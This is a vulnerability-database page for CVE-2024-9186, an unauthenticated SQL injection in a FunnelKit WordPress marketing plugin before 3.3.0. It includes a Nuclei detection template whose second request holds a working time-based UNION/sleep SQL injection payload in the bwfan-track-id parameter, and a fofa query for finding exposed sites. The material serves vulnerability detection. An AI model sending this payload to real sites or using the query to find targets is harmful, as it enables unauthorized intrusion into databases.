The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit WordPress plugin before 3.3.0 is vulnerable to SQL Injection
Reporter | Title | Published | Views | Family All 5 |
---|---|---|---|---|
Patchstack | WordPress Automation By Autonami Plugin < 3.3.0 is vulnerable to SQL Injection | 14 Nov 202400:00 | – | patchstack |
NVD | CVE-2024-9186 | 14 Nov 202406:15 | – | nvd |
CVE | CVE-2024-9186 | 14 Nov 202406:15 | – | cve |
Vulnrichment | CVE-2024-9186 Automation By Autonami < 3.3.0 - Unauthenticated SQLi | 14 Nov 202406:00 | – | vulnrichment |
Cvelist | CVE-2024-9186 Automation By Autonami < 3.3.0 - Unauthenticated SQLi | 14 Nov 202406:00 | – | cvelist |
id: CVE-2024-9186
info:
name: Automation By Autonami < 3.3.0 - SQL Injection
author: s4e-io
severity: high
description: |
The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit WordPress plugin before 3.3.0 does not sanitize and escape the bwfan-track-id parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks.
remediation: Fixed in 3.3.0
reference:
- https://wpscan.com/vulnerability/fab29b59-7e87-4289-88dd-ed5520260c26/
- https://nvd.nist.gov/vuln/detail/CVE-2024-9186
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-89
cve-id: CVE-2024-9186
epss-score: 0.00043
epss-percentile: 0.10302
metadata:
verified: true
max-request: 2
vendor: funnelkit
product: wp-marketing-automations
framework: wordpress
fofa-query: body="wp-content/plugins/wp-marketing-automations/"
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-marketing-automations,time-based-sqli
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/wp-marketing-automations")'
- "status_code == 200"
condition: and
internal: true
- raw:
- |
@timeout 20s
GET /?bwfan-track-id=test%27%20UNION%20SELECT%201%2C1%2C%27%27%2CNOW()%2CNOW()%2C1%2C%27%27%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C%27%27%2CNOW()%2C%27%27%2CNOW()%2C1%2C1%2Csleep(7)%23&bwfan-track-action=click HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "duration>=7"
- "status_code == 200"
condition: and
# digest: 4a0a004730450220475af798deeb18979653559082a1833688358628fb5fcb49c4909d3c434d4019022100853234487a9e8836dc2b71cd3c06a7df47a4cef50347835954a7f96b8ef2b5e2:922c64590222798bb761d5b6d8e72950
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo